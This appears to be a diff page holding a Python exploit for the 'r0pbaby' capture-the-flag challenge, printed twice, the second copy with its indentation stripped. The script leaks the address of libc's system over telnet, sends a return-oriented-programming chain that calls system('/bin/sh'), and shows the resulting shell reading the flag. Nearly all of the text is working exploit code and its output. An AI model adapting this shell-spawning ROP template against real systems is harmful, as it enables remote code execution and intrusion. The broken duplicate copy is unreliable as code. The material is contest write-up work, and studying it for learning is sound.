ytn86 · August 29, 2015 14:21
diff --git a/exploit.py b/exploit.py
 #!/usr/bin/env python3

 import struct
 import sys
 import telnetlib


 HOST = 'r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me'
 PORT = 10436

 """
 % strings -tx libc-2.19_15.so|grep "/bin/sh"
 17ccdb /bin/sh
 % rp --file=libc-2.19_15.so --rop=1 --unique|grep "pop rdi"
 0x000fa47a: pop rdi ; call rax ; (1 found)
 0x000831a8: pop rdi ; jmp rax ; (2 found)
 0x00103fe2: pop rdi ; rep ret ; (2 found)
 0x00022b1a: pop rdi ; ret ; (506 found)
 0x001331ad: pop rdi ; retn 0xFFEE ; (1 found)
 """


 binsh_offset = 0x17ccdb
 system_offset = 0x46640
 popret_offset = 0x22b1a


 def rp(addr):
    addr = struct.pack('<Q', addr)
    return addr

 def get_addr(tn, name):
    tn.write(b'2\n' + name.encode() + b'\n')
    tn.read_until(name.encode() + b': ')
    buf = tn.read_until(b'\n')
    addr = int(buf.decode(), 16)
    print(name + ' :{0}'.format(hex(addr)))
    return  addr

 def exploit():    
    tn = telnetlib.Telnet(HOST, PORT)
    system = get_addr(tn, 'system')
    payload = b'deadbeef'
    payload += rp(system - (system_offset - popret_offset))
    payload += rp(system - (system_offset - binsh_offset))
    payload += rp(system)
    payload += b'\n'
    tn.write(b'3\n')
    tn.write(b'32\n')
    tn.write(payload)
    tn.interact()
    
 def main():
    exploit()
            

 if __name__ == '__main__':
    main()


 """
 % python exploit.py
 system :0x7f6066881640
 1) Get libc address
 2) Get address of a libc function
 3) Nom nom r0p buffer to stack
 4) Exit
 : Enter bytes to send (max 1024): 1) Get libc address
 2) Get address of a libc function
 3) Nom nom r0p buffer to stack
 4) Exit
 : Bad choice.
 cat /home/r0pbaby/flag
 The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?
 """
	#!/usr/bin/env python3

	import struct
	import sys
	import telnetlib


	HOST = 'r0pbaby_542ee6516410709a1421141501f03760.quals.shallweplayaga.me'
	PORT = 10436

	"""
	% strings -tx libc-2.19_15.so\|grep "/bin/sh"
	17ccdb /bin/sh
	% rp --file=libc-2.19_15.so --rop=1 --unique\|grep "pop rdi"
	0x000fa47a: pop rdi ; call rax ; (1 found)
	0x000831a8: pop rdi ; jmp rax ; (2 found)
	0x00103fe2: pop rdi ; rep ret ; (2 found)
	0x00022b1a: pop rdi ; ret ; (506 found)
	0x001331ad: pop rdi ; retn 0xFFEE ; (1 found)
	"""


	binsh_offset = 0x17ccdb
	system_offset = 0x46640
	popret_offset = 0x22b1a


	def rp(addr):
	addr = struct.pack('<Q', addr)
	return addr

	def get_addr(tn, name):
	tn.write(b'2\n' + name.encode() + b'\n')
	tn.read_until(name.encode() + b': ')
	buf = tn.read_until(b'\n')
	addr = int(buf.decode(), 16)
	print(name + ' :{0}'.format(hex(addr)))
	return addr

	def exploit():
	tn = telnetlib.Telnet(HOST, PORT)
	system = get_addr(tn, 'system')
	payload = b'deadbeef'
	payload += rp(system - (system_offset - popret_offset))
	payload += rp(system - (system_offset - binsh_offset))
	payload += rp(system)
	payload += b'\n'
	tn.write(b'3\n')
	tn.write(b'32\n')
	tn.write(payload)
	tn.interact()

	def main():
	exploit()


	if __name__ == '__main__':
	main()


	"""
	% python exploit.py
	system :0x7f6066881640
	1) Get libc address
	2) Get address of a libc function
	3) Nom nom r0p buffer to stack
	4) Exit
	: Enter bytes to send (max 1024): 1) Get libc address
	2) Get address of a libc function
	3) Nom nom r0p buffer to stack
	4) Exit
	: Bad choice.
	cat /home/r0pbaby/flag
	The flag is: W3lcome TO THE BIG L3agu3s kiddo, wasn't your first?
	"""